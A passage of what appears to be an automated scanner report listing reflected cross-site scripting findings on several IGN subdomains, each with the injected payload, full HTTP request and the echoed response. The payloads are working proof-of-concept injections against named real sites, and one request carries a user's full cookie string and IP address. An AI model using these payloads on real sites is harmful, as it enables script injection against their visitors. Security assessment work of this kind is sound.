GET /?21b33"><script>alert(1)</script>a678f7db862=1 HTTP/1.1 Host: bluray.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Blu-ray Movies ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://bluray.ign.com/?21b33"><script>alert(1)</script>a678f7db862=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.63. http://bluray.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bluray.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 495f9"-alert(1)-"4ec9ce9d1ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?495f9"-alert(1)-"4ec9ce9d1ca=1 HTTP/1.1 Host: bluray.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Blu-ray Movies ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://bluray.ign.com/?495f9"-alert(1)-"4ec9ce9d1ca=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.64. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bluray.ign.com
Path:
/index/release.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dc3"-alert(1)-"2d159836ba5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/release.html?14dc3"-alert(1)-"2d159836ba5=1 HTTP/1.1 Host: bluray.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Blu-ray Movies ...[SNIP]... of _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://bluray.ign.com/index/release.html?14dc3"-alert(1)-"2d159836ba5=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.65. http://bluray.ign.com/index/release.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bluray.ign.com
Path:
/index/release.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b279d"><script>alert(1)</script>bce7cd5b7fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/release.html?b279d"><script>alert(1)</script>bce7cd5b7fe=1 HTTP/1.1 Host: bluray.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Blu-ray Movies ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://bluray.ign.com/index/release.html?b279d"><script>alert(1)</script>bce7cd5b7fe=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.66. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bluray.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e16e1"-alert(1)-"bdf7753c49f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index/reviews.html?e16e1"-alert(1)-"bdf7753c49f=1 HTTP/1.1 Host: bluray.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Blu-ray Movies ...[SNIP]... of _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://bluray.ign.com/index/reviews.html?e16e1"-alert(1)-"bdf7753c49f=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.67. http://bluray.ign.com/index/reviews.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bluray.ign.com
Path:
/index/reviews.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ff20"><script>alert(1)</script>c3a11347216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/reviews.html?4ff20"><script>alert(1)</script>c3a11347216=1 HTTP/1.1 Host: bluray.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head> <title>IGN Blu-ray Movies ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://bluray.ign.com/index/reviews.html?4ff20"><script>alert(1)</script>c3a11347216=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.68. http://boards.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boards.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a633f"style%3d"x%3aexpression(alert(1))"c7f6defbe5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a633f"style="x:expression(alert(1))"c7f6defbe5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?a633f"style%3d"x%3aexpression(alert(1))"c7f6defbe5b=1 HTTP/1.1 Host: boards.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
IGN Board ...[SNIP]... <a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/?a633f"style="x:expression(alert(1))"c7f6defbe5b=1&x=1" title="Switch to the white theme"> ...[SNIP]...
1.69. http://boards.ign.com/comics_boards/c5025 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boards.ign.com
Path:
/comics_boards/c5025
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 144d2"style%3d"x%3aexpression(alert(1))"dc6fedb49ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 144d2"style="x:expression(alert(1))"dc6fedb49ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /comics_boards/c5025?144d2"style%3d"x%3aexpression(alert(1))"dc6fedb49ed=1 HTTP/1.1 Host: boards.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
Comics Boards - ...[SNIP]... <a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/comics_boards/c5025?144d2"style="x:expression(alert(1))"dc6fedb49ed=1&x=1" title="Switch to the white theme"> ...[SNIP]...
1.70. http://boards.ign.com/game_help_community_board/b5143/p1 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boards.ign.com
Path:
/game_help_community_board/b5143/p1
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a579"style%3d"x%3aexpression(alert(1))"dd2c3a9596f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6a579"style="x:expression(alert(1))"dd2c3a9596f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /game_help_community_board/b5143/p1?6a579"style%3d"x%3aexpression(alert(1))"dd2c3a9596f=1 HTTP/1.1 Host: boards.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
Game Help Commu ...[SNIP]... <a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/game_help_community_board/b5143/p1?6a579"style="x:expression(alert(1))"dd2c3a9596f=1&x=1" title="Switch to the white theme"> ...[SNIP]...
1.71. http://boards.ign.com/general_game_help_board/b5030/p1 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boards.ign.com
Path:
/general_game_help_board/b5030/p1
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fb1e"style%3d"x%3aexpression(alert(1))"4e68eab179b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7fb1e"style="x:expression(alert(1))"4e68eab179b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /general_game_help_board/b5030/p1?7fb1e"style%3d"x%3aexpression(alert(1))"4e68eab179b=1 HTTP/1.1 Host: boards.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
General Game He ...[SNIP]... <a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/general_game_help_board/b5030/p1?7fb1e"style="x:expression(alert(1))"4e68eab179b=1&x=1" title="Switch to the white theme"> ...[SNIP]...
1.72. http://boards.ign.com/movies/c5017 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boards.ign.com
Path:
/movies/c5017
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75b7"style%3d"x%3aexpression(alert(1))"f3c2560ab6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d75b7"style="x:expression(alert(1))"f3c2560ab6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /movies/c5017?d75b7"style%3d"x%3aexpression(alert(1))"f3c2560ab6a=1 HTTP/1.1 Host: boards.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
Movies - IGN Bo ...[SNIP]... <a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/movies/c5017?d75b7"style="x:expression(alert(1))"f3c2560ab6a=1&x=1" title="Switch to the white theme"> ...[SNIP]...
1.73. http://boards.ign.com/nintendo_wii_ds_boards/c5062 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boards.ign.com
Path:
/nintendo_wii_ds_boards/c5062
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eab04"style%3d"x%3aexpression(alert(1))"24a467ebcbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eab04"style="x:expression(alert(1))"24a467ebcbc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /nintendo_wii_ds_boards/c5062?eab04"style%3d"x%3aexpression(alert(1))"24a467ebcbc=1 HTTP/1.1 Host: boards.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:11:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET 2.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="TST" X-AspNetMvc-Version: 1.0 Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:37 GMT; path=/; HttpOnly Set-Cookie: CategoryView=5062; path=/ Cache-Control: private Expires: Wed, 07 Feb 2001 01:11:37 GMT Content-Type: text/html; charset=utf-8 Content-Length: 77313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
Nintendo Wii &a ...[SNIP]... <a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/nintendo_wii_ds_boards/c5062?eab04"style="x:expression(alert(1))"24a467ebcbc=1&x=1" title="Switch to the white theme"> ...[SNIP]...
1.74. http://boards.ign.com/pc_games_and_more/c5060 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boards.ign.com
Path:
/pc_games_and_more/c5060
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 771e2"style%3d"x%3aexpression(alert(1))"7f50f9fa2d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 771e2"style="x:expression(alert(1))"7f50f9fa2d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pc_games_and_more/c5060?771e2"style%3d"x%3aexpression(alert(1))"7f50f9fa2d2=1 HTTP/1.1 Host: boards.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
PC Games and Mo ...[SNIP]... <a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/pc_games_and_more/c5060?771e2"style="x:expression(alert(1))"7f50f9fa2d2=1&x=1" title="Switch to the white theme"> ...[SNIP]...
1.75. http://boards.ign.com/playstation_boards/c5058 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boards.ign.com
Path:
/playstation_boards/c5058
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b88ff"style%3d"x%3aexpression(alert(1))"3782c71c347 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b88ff"style="x:expression(alert(1))"3782c71c347 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /playstation_boards/c5058?b88ff"style%3d"x%3aexpression(alert(1))"3782c71c347=1 HTTP/1.1 Host: boards.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:11:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET 2.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="TST" X-AspNetMvc-Version: 1.0 Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:42 GMT; path=/; HttpOnly Set-Cookie: CategoryView=5058; path=/ Cache-Control: private Expires: Wed, 07 Feb 2001 01:11:42 GMT Content-Type: text/html; charset=utf-8 Content-Length: 81438
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
PlayStation Boa ...[SNIP]... <a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/playstation_boards/c5058?b88ff"style="x:expression(alert(1))"3782c71c347=1&x=1" title="Switch to the white theme"> ...[SNIP]...
1.76. http://boards.ign.com/tv/c5026 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boards.ign.com
Path:
/tv/c5026
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5659d"style%3d"x%3aexpression(alert(1))"d0b714997f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5659d"style="x:expression(alert(1))"d0b714997f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /tv/c5026?5659d"style%3d"x%3aexpression(alert(1))"d0b714997f=1 HTTP/1.1 Host: boards.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
TV - IGN Boards ...[SNIP]... <a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/tv/c5026?5659d"style="x:expression(alert(1))"d0b714997f=1&x=1" title="Switch to the white theme"> ...[SNIP]...
1.77. http://boards.ign.com/xbox_360_boards/c5056 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://boards.ign.com
Path:
/xbox_360_boards/c5056
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85096"style%3d"x%3aexpression(alert(1))"83a44cb2b94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85096"style="x:expression(alert(1))"83a44cb2b94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /xbox_360_boards/c5056?85096"style%3d"x%3aexpression(alert(1))"83a44cb2b94=1 HTTP/1.1 Host: boards.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 01:11:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET 2.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="TST" X-AspNetMvc-Version: 1.0 Set-Cookie: BoardCookieV3%5Fboards%2Eign%2Ecom=dc=no&ra=False; expires=Tue, 07-Feb-2012 01:11:36 GMT; path=/; HttpOnly Set-Cookie: CategoryView=5056; path=/ Cache-Control: private Expires: Wed, 07 Feb 2001 01:11:36 GMT Content-Type: text/html; charset=utf-8 Content-Length: 74412
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title>
Xbox 360 Boards ...[SNIP]... <a href="/User/ChangeTheme?theme=Ign2009&returnUrl=http://boards.ign.com/xbox_360_boards/c5056?85096"style="x:expression(alert(1))"83a44cb2b94=1&x=1" title="Switch to the white theme"> ...[SNIP]...
1.78. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cd43"><script>alert(1)</script>bc6f5a7fbe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?7cd43"><script>alert(1)</script>bc6f5a7fbe9=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/?7cd43"><script>alert(1)</script>bc6f5a7fbe9=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.79. http://cheats.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 778c0"-alert(1)-"0daba286c40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?778c0"-alert(1)-"0daba286c40=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <script> if(typeof _comscoreGuard == 'undefined') { COMSCORE.beacon({ c1:2, c2:"3000068", c3:"", c4:"http://cheats.ign.com/?778c0"-alert(1)-"0daba286c40=1", c5:"", c6:"", c15:"" }); var _comscoreGuard = new Object(); } </script> ...[SNIP]...
1.80. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://cheats.ign.com
Path:
/index/cheats/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff66c"><script>alert(1)</script>3b17bfe17cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index/cheats/index.html?ff66c"><script>alert(1)</script>3b17bfe17cb=1 HTTP/1.1 Host: cheats.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co ...[SNIP]... <img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/cheats/index.html?ff66c"><script>alert(1)</script>3b17bfe17cb=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> ...[SNIP]...
1.81. http://cheats.ign.com/index/cheats/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
